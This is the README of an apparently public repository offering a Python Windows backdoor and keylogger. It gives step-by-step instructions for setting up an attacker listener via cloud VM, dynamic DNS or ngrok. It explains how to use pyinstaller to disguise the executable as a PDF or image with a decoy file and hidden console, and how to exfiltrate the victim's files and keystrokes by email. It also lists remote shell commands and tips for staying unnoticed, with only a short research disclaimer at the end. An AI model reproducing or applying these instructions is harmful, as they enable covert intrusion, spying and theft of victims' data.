Imagine you're a burglar casing a house for a potential robbery. You see a "Protected by…" security sign staked in the front lawn and Ring doorbell camera. Being the crafty cat burglar that you are, you hop the fence leading to the back of the house. You see there's a backdoor, cross your fingers, and try the knob—it's unlocked. To the casual observer, there are no external signs of a burglary. In fact, there's no reason you couldn't rob this house through the same backdoor again, assuming you don't ransack the place.

Computer backdoors work in much the same way.

In the world of cybersecurity, a backdoor refers to any method by which authorized and unauthorized users are able to get around normal security measures and gain high level user access (aka root access) on a computer system, network, or software application. Once they're in, cybercriminals can use a backdoor to steal personal and financial data, install additional malware, and hijack devices.

Read more here: Malwarebytes Blog

The files provided in the repo are raw python coded files. The most important one for you is the data.py file.

Before we use the backdoor, we need the following things:

1. A host that you control having a static IP or a subscription service with a dynamic DNS client. You can also use a tunnelling service such as ngrok. Find the links in the references section.
2. Now that you have the public IP/dynamic DNS configured, setup the firewall to allow a port that you want the traffic to be received to (on the host you control)
3. Open the data.py file and put these values in the respective fields. Note that there are other data values but you do not need to change them
4. Have a file that you want the victim to open ready - a pdf or a jpg etc. Note the name and full path of the file on the host computer where you will compile this backdoor
5. Input this file name in the double quotes given in data.py
6. If you want the keylogger to send you mails periodically, add your email and password in the data.py. You can also change the time variable in seconds to denote in how much time the mail needs to be sent to you. Note: The initial mail will be sent to you when you switch on the Keylogger. All the subsequent mails will be in the interval time seconds.

1. We will use the pyinstaller module for this. Make sure you have python3.7 installed on the host system you control

   pip3 install pyinstaller

2. Run the following command to combine the file as one and run it:

   pyinstaller --add-data "<Full-Path>;." --icon "<Full-Pathto-ico-File>" --one-file --noconsole <Name of the base py file>

   Substitute <Full-Path> with the path where your .jpg or .pdf file is located in the host computer you control. Similarly substitute <Full-Pathto-ico-File> with the ico file you want the victim to see (For eg: The ico file can be the Adobe PDF icon).

   The <Name of the base py file> is the base py file that will be run in the victim machine. Substitute ConnectBdoor.py in its place for the file to work as this is the main py file. If you change the name of this py file, make sure you change it while creating the .exe as well!!

1. Run the listen.py file in the host computer you control.
2. Run the executable in the victim machine. You will see that the front file opens (One that we added as the <Full-Path> above).
3. You will see an incoming connection on your host machine.
4. Use popular windows cmd commands like dir which work perfectly fine.

1. download - This command takes 2 arguments. Full syntax:

   download <Full File Path in Victim Machine> <Full Path in Host Machine>

   Note: The Full paths need to be given in double quotes. Or if you want to download a file in the current folder, you may use just the Filename. In this case no double quotes are needed. Only the first argument is compulsory!

2. upload- This command takes 2 arguments. Full syntax:

   upload <Full File Path in Host Machine> <Full Path in Victim Machine>

   Note: The Full paths need to be given in double quotes. Or if you want to upload a file in the current folder of where the Backdoor is located on the Victim Machine, you may use just the Filename. In this case no double quotes are needed. (You may not know where the victim has downloaded and executed the file from - eg: If they executed the backdoor from the desktop, if you upload the file by not giving your desired full path, all your files will be uploaded to the desktop and can alert the user!)

3. cd - This command takes a single argument. Full syntax:

   cd <Full-Path of Folder in double Quotes or FolderName>

   Note: Full path needs to be given in case the user wants to change to a folder not in current directory. Can also use cd .. if one wants to go to previous directory.

4. pwd - Prints the Present Working Directory and does not take any arguments!

Some links where you can setup a host machine to receive connections:

1. Option 1: Use Cloud VMs - Cheap and effective way to get a public IP and a working machine in the cloud, accessible from anywhere. [For experimenting and legal activities it is perfectly fine. Please do not use the machine for illegal activities like spying on your boss, etc.]. Some examples: Google Cloud, AWS, Linode, DigitalOcean

2. Option 2: Use Dynamic DNS. Find the link to configure it on your local machine. Put the static DNS name in place of the IP in data.py. Make sure the DNS client and your firewall allows incoming connections on the desired port.

3. Option 3: Use Ngrok to open a tcp port into your local machine. Learn how to do that from the official site.

You are all set. Have fun! Feel free to fork the repo and use it to further your knowledge. Please use it for research purposes and not indulge in unethical means!